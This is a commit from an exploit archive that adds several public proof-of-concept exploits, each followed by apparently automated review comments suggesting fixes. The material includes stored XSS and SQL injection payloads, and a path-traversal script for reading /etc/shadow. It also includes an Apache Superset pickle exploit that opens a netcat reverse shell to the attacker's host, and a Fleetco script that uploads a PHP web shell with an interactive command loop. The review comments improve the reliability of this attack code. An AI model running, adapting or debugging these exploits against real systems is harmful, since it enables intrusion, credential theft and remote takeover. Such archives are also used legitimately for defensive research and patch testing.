10 changes to exploits/shellcodes Mozilla Firefox 63.0.1 - Denial of Service (PoC) Budabot 4.0 - Denial of Service (PoC) CyberArk 9.7 - Memory Disclosure Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection PHP Server Monitor 3.3.1 - Cross-Site Request Forgery Apache Superset 0.23 - Remote Code Execution Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting
Offensive Security
committed
Dec 4, 2018
1 parent
7cc86c3
commit 0a4925c
Showing
11 changed files
with
607 additions
and
0 deletions.
@@ -0,0 +1,21 @@ | ||
# Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting | ||
# Date: 2018-11-27 | ||
# Exploit Author: Luca.Chiou | ||
# Vendor Homepage: https://www.rockwellautomation.com/ | ||
# Version: 1408-EM3A-ENT B | ||
# Tested on: It is a proprietary devices: https://ab.rockwellautomation.com/zh/Energy-Monitoring/1408-PowerMonitor-1000 | ||
# CVE : N/A | ||
|
||
# 1. Description: | ||
# In Rockwell Automation Allen-Bradley PowerMonitor 1000 web page, | ||
# user can add a new user by access the /Security/Security.shtm. | ||
# When users add a new user, the new user’s account will in the post data. | ||
# Attackers can inject malicious XSS code in user’s account parameter of post data. | ||
# The user’s account parameter will be stored in database, so that cause a stored XSS vulnerability. | ||
|
||
# 2. Proof of Concept: | ||
# Browse http://<Your Modem IP>/Security/Security.shtm | ||
# In page Security.shtm, add a new user | ||
# Send this post data: | ||
|
||
/Security/cgi-bin/security|0|0|<script>alert(123)</script> |
@@ -0,0 +1,24 @@ | ||
# Exploit Title: Budabot 4.0 - Denial of Service (PoC) | ||
# Date: 2018-10-15 | ||
# Exploit Author: Ryan Delaney | ||
# Author Contact: ryan.delaney@owasp.org | ||
# Vendor Homepage: http://budabot.com/ | ||
# Software Link: http://budabot.com/forum/viewtopic.php?f=8&t=1413 | ||
# Version: 0.6 -> 4.0 | ||
# Tested on: 4.0 | ||
# CVE: CVE-2018-19290 | ||
|
||
# 1. Description | ||
# In modules/HELPBOT_MODULE in Budabot 0.6 through 4.0, lax syntax validation | ||
# allows remote attackers to perform a command injection attack against the | ||
# PHP daemon with a crafted command, resulting in a denial of service or | ||
# possibly unspecified other impact. In versions before 3.0, | ||
# modules/HELPBOT_MODULE/calc.php has the vulnerable code; in 3.0 and above, | ||
# modules/HELPBOT_MODULE/HelpbotController.class.php has the vulnerable code. | ||
|
||
# 2. Proof of Concept | ||
|
||
Start the Budabot listener, set valid configuration options, and wait for | ||
the chatbot to announce it's ready in-game. | ||
Send the chatbot a private message containing "!calc 5 x 5", and the | ||
Budabot listener will terminate. |
@@ -0,0 +1,64 @@ | ||
# Exploit Title: PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure | ||
# Date: 2018-11-28 | ||
# Exploit Author: paragonsec @ Critical Start | ||
# Vendor Homepage: https://live.paloaltonetworks.com/t5/Expedition-Migration-Tool/ct-p/migration_tool | ||
# Software Link: https://paloaltonetworks.app.box.com/s/davuvo65k727nm7feuug0d783zo6fjx8 | ||
# Version: 1.0.106 | ||
# Tested on: Linux | ||
# CVE : 2018-10142 | ||
|
||
#!/usr/bin/env python | ||
|
||
import argparse | ||
import requests | ||
import sys | ||
import collections | ||
|
||
#Colors | ||
OKRED = '\033[91m' | ||
OKGREEN = '\033[92m' | ||
ENDC = '\033[0m' | ||
|
||
parser = argparse.ArgumentParser() | ||
parser.add_argument("--rhost", help = "Remote Host") | ||
parser.add_argument('--file', help = 'File to check (e.g /etc/passwd, /etc/shadow)') | ||
args = parser.parse_args() | ||
|
||
# Check to ensure at least one argument has been passed | ||
if len(sys.argv)==1: | ||
parser.print_help(sys.stderr) | ||
sys.exit(1) | ||
|
||
rhost = args.rhost | ||
rfile = args.file | ||
|
||
exploit_url = "http://" + rhost + "/API/process/checkPidStatus.php" | ||
|
||
headers = [ | ||
('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'), | ||
('Accept', 'application/json, text/javascript, */*; q=0.01'), | ||
('Accept-Language', 'en-US,en;q=0.5'), | ||
('Accept-Encoding', 'gzip, deflate'), | ||
('Connection', 'close') | ||
] | ||
|
||
# probably not necessary but did it anyways | ||
headers = collections.OrderedDict(headers) | ||
|
||
# Setting up GET body parameters | ||
body = "pid=/../" + rfile | ||
|
||
print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (https://www.criticalstart.com)") | ||
print(OKGREEN + "CVE: " + ENDC + "2018-10142") | ||
print(OKGREEN + "Description: " + ENDC + "Information Disclosure in Expedition Migration Tool") | ||
print(OKGREEN + "Vuln Versions: " + ENDC + "< 1.0.107\n") | ||
|
||
print(OKGREEN + "[+]" + ENDC + "Running exploit...") | ||
|
||
s = requests.Session() | ||
|
||
req = requests.post(exploit_url, headers=headers, data=body) | ||
if "false" not in req.text: | ||
print(OKGREEN + "[+]" + ENDC + "Exploit worked! " + rfile + " exists!\n") | ||
else: | ||
print(OKRED + "[!]" + ENDC + "File " + rfile + " does not exist!\n") |
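Review bot: The `requests.Session()` bound to `s` is never used; the request two lines later goes through `requests.post` directly, so either drop the session object or send through it, `req = s.post(exploit_url, headers=headers, data=body)`. The guard `if len(sys.argv)==1` only rejects an empty command line, so `--file` given without `--rhost` leaves `rhost` as `None` and the `"http://" + rhost` concatenation raises `TypeError` before any request; `parser.add_argument("--rhost", required=True, help="Remote Host")` (and likewise for `--file`) lets argparse report the omission instead. The `#!/usr/bin/env python` shebang sits below the header comments, so it is ignored when the file is executed directly and would have to be line 1 to take effect; the Apache Superset and Fleetco scripts in this commit have the same problem.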
@@ -0,0 +1,97 @@ | ||
# Exploit Title: Apache Superset 0.23 - Remote Code Execution | ||
# Date: 2018-05-17 | ||
# Exploit Author: David May (david.may@semanticbits.com) | ||
# Vendor Homepage: https://superset.apache.org/ | ||
# Software Link: https://github.com/apache/incubator-superset | ||
# Version: Any before 0.23 | ||
# Tested on: Ubuntu 18.04 | ||
# CVE-ID: CVE-2018-8021 | ||
|
||
# I originally disclosed this to the Apache Superset team back in May, and the fix had already been | ||
# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE. | ||
|
||
#!/usr/bin/env python | ||
|
||
import sys | ||
import os | ||
from lxml import html | ||
import requests | ||
|
||
# Change these values to your TCP listener | ||
myIP = '192.168.137.129' | ||
myPort = '8888' | ||
# Credentials must belong to user with 'can Import Dashboards on Superset' privilege | ||
username = 'test' | ||
password = 'test' | ||
|
||
# Logic in case script arguments are not given | ||
if len(sys.argv) < 3: | ||
print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...') | ||
print('Script Usage:') | ||
print('./supersetrce.py <superset server ip> <superset port>') | ||
sys.exit() | ||
|
||
else: | ||
# Script arguments | ||
supersetIP = sys.argv[1] | ||
supersetPort = sys.argv[2] | ||
# Verify these URLs match your environment | ||
login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/' | ||
upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards' | ||
|
||
# Checks to see if file that we are going to write already exists in case this is run more than once | ||
if os.path.isfile('evil.pickle'): | ||
os.remove('evil.pickle') | ||
|
||
# Headers that we append to our POST requests | ||
headers_dict = { | ||
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0', | ||
'DNT': '1', | ||
'Connection': 'close', | ||
'Upgrade-Insecure-Requests': '1', | ||
} | ||
|
||
# Creates evil pickle file and writes the reverse shell to it | ||
evilPickle = open('evil.pickle','w+') | ||
evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + myIP + ' ' + myPort + ' 1>/tmp/backpipe\'\ntR.') | ||
evilPickle.close() | ||
|
||
# Start a session so we have persistent cookies | ||
session = requests.session() | ||
|
||
# Grabs the Login page to parse it for its CSRF token | ||
login_page = session.get(login_URL) | ||
if login_page.status_code != 200: | ||
print('Login page not reached, verify URLs in script') | ||
login_tree = html.fromstring(login_page.content) | ||
csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value') | ||
|
||
# Form data that is sent in the POST request to Login page | ||
login_data = { | ||
'csrf_token' : csrf_token, | ||
'username' : username, | ||
'password' : password, | ||
} | ||
|
||
# Adds the Referer header for the login page | ||
headers_dict['Referer'] = login_URL | ||
|
||
# Logon action | ||
login = session.post(login_URL, headers=headers_dict, data=login_data) | ||
|
||
# Grabs the Upload page to parse it for its CSRF token | ||
upload_page = session.get(upload_URL) | ||
if upload_page.status_code != 200: | ||
print('Upload page not reached, verify credentials and URLs in script') | ||
upload_tree = html.fromstring(upload_page.content) | ||
csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value') | ||
|
||
# Adds the Referer header for the Upload page | ||
headers_dict['Referer'] = upload_URL | ||
|
||
# Upload action | ||
upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')}) | ||
|
||
# Closes the session | ||
session.close() | ||
sys.exit() |
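Review bot: The status checks after `login_page = session.get(login_URL)` and `upload_page = session.get(upload_URL)` print a message but do not stop, so on a failed fetch the script still parses the error page and carries on with whatever the xpath returned; each should be followed by `sys.exit(1)`. The file handle opened inline in the `files=` argument of the upload `session.post` is never closed, and `evilPickle` is written with a bare `open`/`close` pair rather than `with`, so neither is released on an exception. `evil.pickle` is written to the current directory and left behind after the run; the earlier `os.remove` only clears it on the next invocation, so a cleanup after the upload (or a `tempfile`) would be cleaner.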
@@ -0,0 +1,77 @@ | ||
# Exploit Title: Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution | ||
# Date: 2018-11-23 | ||
# Exploit Author: Özkan Mustafa Akkuş (AkkuS) | ||
# Contact: https://pentest.com.tr | ||
# Vendor Homepage: https://www.fleetco.space | ||
# Software Link: http://www.fleetco.space/download/215/ | ||
# Version: v1.2 | ||
# Category: Webapps | ||
# Tested on: XAMPP for Linux 1.7.2 | ||
# Software Description : Fleetco FMM is a free, web-based vehicle fleet maintenance management | ||
# system written in PHP with MySQL database backend. | ||
# Description : Fleetco 1.2 and lower versions allows to upload arbitrary ".php" files which | ||
# leads to a remote command execution on the remote server. Any authorized user is enough to exploit. | ||
# ================================================================== | ||
# PoC: | ||
|
||
#!/usr/bin/python | ||
|
||
import mechanize | ||
import sys | ||
import cookielib | ||
import requests | ||
import colorama | ||
from colorama import Fore | ||
|
||
print "\n[*] Fleetco Fleet Maintenance Management v1.2 - Remote Code Execution" | ||
print "[*] Vulnerability discovered by AkkuS" | ||
print "[*] My Blog - https://www.pentest.com.tr\n" | ||
if (len(sys.argv) != 2): | ||
print "[*] Usage: poc.py <RHOST>" | ||
exit(0) | ||
|
||
rhost = sys.argv[1] | ||
|
||
# User Information Input | ||
UserName = str(raw_input("User Name: ")) | ||
Password = str(raw_input("Password: ")) | ||
|
||
# Login into site | ||
print(Fore.BLUE + "+ [*] Loging in...") | ||
br = mechanize.Browser() | ||
br.set_handle_robots(False) | ||
|
||
# Cookie Jar | ||
cj = cookielib.LWPCookieJar() | ||
br.set_cookiejar(cj) | ||
|
||
br.open("http://"+rhost+"/login.php") | ||
assert br.viewing_html() | ||
br.select_form(name="form1") | ||
br.select_form(nr=0) | ||
br.form['username'] = UserName | ||
br.form['password'] = Password | ||
br.submit() | ||
|
||
# Where are you | ||
title = br.title() | ||
print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now") | ||
|
||
# Create Accident Records with multipart/form-data to RCE | ||
rce_headers = {"Content-Type": "multipart/form-data; boundary=---------------------------10664657171782352435254769348"} | ||
rce_data="-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Fleet_1\"\r\n\r\nCargo Carriers\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Vehicle_1\"\r\n\r\nBF1470\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Type_1\"\r\n\r\nLorry\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Date_1\"\r\n\r\n11/07/2018\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Date_1\"\r\n\r\ndate2\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Time_1\"\r\n\r\ntime\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Driver_1\"\r\n\r\nAntony Croos\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Details_1\"\r\n\r\ntest\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Images_1\"\r\n\r\nupload2\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Images_1\"; filename=\"RCE.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>\n\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"filename_Images_1\"\r\n\r\nRCE.php\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_EnteredBy_1\"\r\n\r\nMark Croos\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_SysDate_1\"\r\n\r\n2018-11-23 
14:58:09\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"a\"\r\n\r\nadded\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"rndVal\"\r\n\r\n0.8040138072331872\r\n-----------------------------10664657171782352435254769348--\r\n" | ||
|
||
upload = requests.post("http://"+rhost+"/accidents_add.php?submit=1&", headers=rce_headers, cookies=cj, data=rce_data) | ||
if upload.status_code == 200: | ||
print (Fore.GREEN + "+ [*] Shell successfully uploaded!") | ||
|
||
# Shell validation and exploit | ||
while True: | ||
shellctrl = requests.get("http://"+rhost+"/files/RCE.php") | ||
if shellctrl.status_code == 200: | ||
Command = str(raw_input(Fore.WHITE + "shell> ")) | ||
URL = requests.get("http://"+rhost+"/files/RCE.php?cmd="+Command+"") | ||
print URL.text | ||
else: | ||
print (Fore.RED + "+ [X] Unable to upload or access the shell") | ||
sys.exit() |
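Review bot: `br.select_form(name="form1")` is immediately overridden by `br.select_form(nr=0)`, so the named selection has no effect and the two lines silently disagree if the first form on the page is not `form1`; keep only the one that is intended. The usage branch calls `exit(0)`, which reports success to the caller for a usage error; `sys.exit(1)` is the conventional code. The script is Python 2 only (`print` statement, `raw_input`, `cookielib`) but the header does not say so, and `colorama.init()` is never called, so the `Fore` escape codes are only rendered on terminals that understand ANSI natively; a `# Requires Python 2` line in the header would save readers a confusing SyntaxError on Python 3.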
@@ -0,0 +1,55 @@ | ||
# Exploit Title: Joomla! Component JE Photo Gallery 1.1 - SQL Injection | ||
# Dork: N/A | ||
# Date: 2018-11-26 | ||
# Exploit Author: Ihsan Sencan | ||
# Vendor Homepage: https://joomlaextensions.co.in | ||
# Software Link: http://joomlaextensions.co.in/download/1387375463_JE%20PhotoGallery%20(%20J-%203.0%20).zip | ||
# Version: 1.1 | ||
# Category: Webapps | ||
# Tested on: WiN7_x64/KaLiLinuX_x64 | ||
# CVE: N/A | ||
|
||
# POC: | ||
# 1) | ||
|
||
#!/usr/bin/perl -w | ||
|
||
sub clear{ | ||
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); } | ||
clear(); | ||
print " | ||
./ | ||
(o o) | ||
###############################oOOo-(-)-oOOo############################### | ||
______ _______ ___ _ __ _____ _______ ___________ _ __ | ||
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / / | ||
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ / | ||
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| / | ||
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/ | ||
WWW.IHSAN.NET | ||
+ | ||
Joomla! Component JE Photo Gallery 1.1 - SQL Injection | ||
############################################################################ | ||
"; | ||
|
||
use LWP::UserAgent; | ||
print "\nTarget:[http://site.com/path/]: "; | ||
chomp(my $target=<STDIN>); | ||
print "\n[!] Exploiting Progress...\n"; | ||
print "\n"; | ||
$UT="wizjk_users"; | ||
$S="index.php?"; | ||
$I="tmpl=component&option=com_jephotogallery&view=category&task=fetchimage&categoryid="; | ||
$E="%2d%32%39%20%55%4e%69%6f%6e%20%73%65%4c%45%43%54%20%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%75%73%65%72%6e%61%6d%65%2c%30%78%33%61%2c%70%61%73%73%77%6f%72%64%29%20%46%52%4f%4d%20".$UT."%29%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%4e%75%4c%4c%2c%30%2c%30%2d%2d%20%2d"; | ||
$SIE = LWP::UserAgent->new() or die "Could not initialize browser\n"; | ||
$SIE->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'); | ||
$host = $target . "".$S."".$I."".$E.""; | ||
$res = $SIE->request(HTTP::Request->new(GET=>$host)); | ||
$answer = $res->content; if ($answer =~/{"id":"(.*?)"/){ | ||
print "[+] Success !!!\n"; | ||
print "\n[+] Detail : $1\n"; | ||
print "\n"; | ||
} | ||
else{print "\n[-]Not found.\n"; | ||
} |
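Review bot: The script runs without `use strict`, so `$UT`, `$S`, `$I`, `$E`, `$SIE`, `$host`, `$res` and `$answer` are all undeclared package globals; adding `use strict;` next to `use LWP::UserAgent;` and declaring them with `my` would let the `-w` on the shebang actually catch typos. The `or die "Could not initialize browser\n"` after `LWP::UserAgent->new()` is effectively dead, since the constructor returns an object rather than a false value, so the guard gives a misleading impression that failure is handled there.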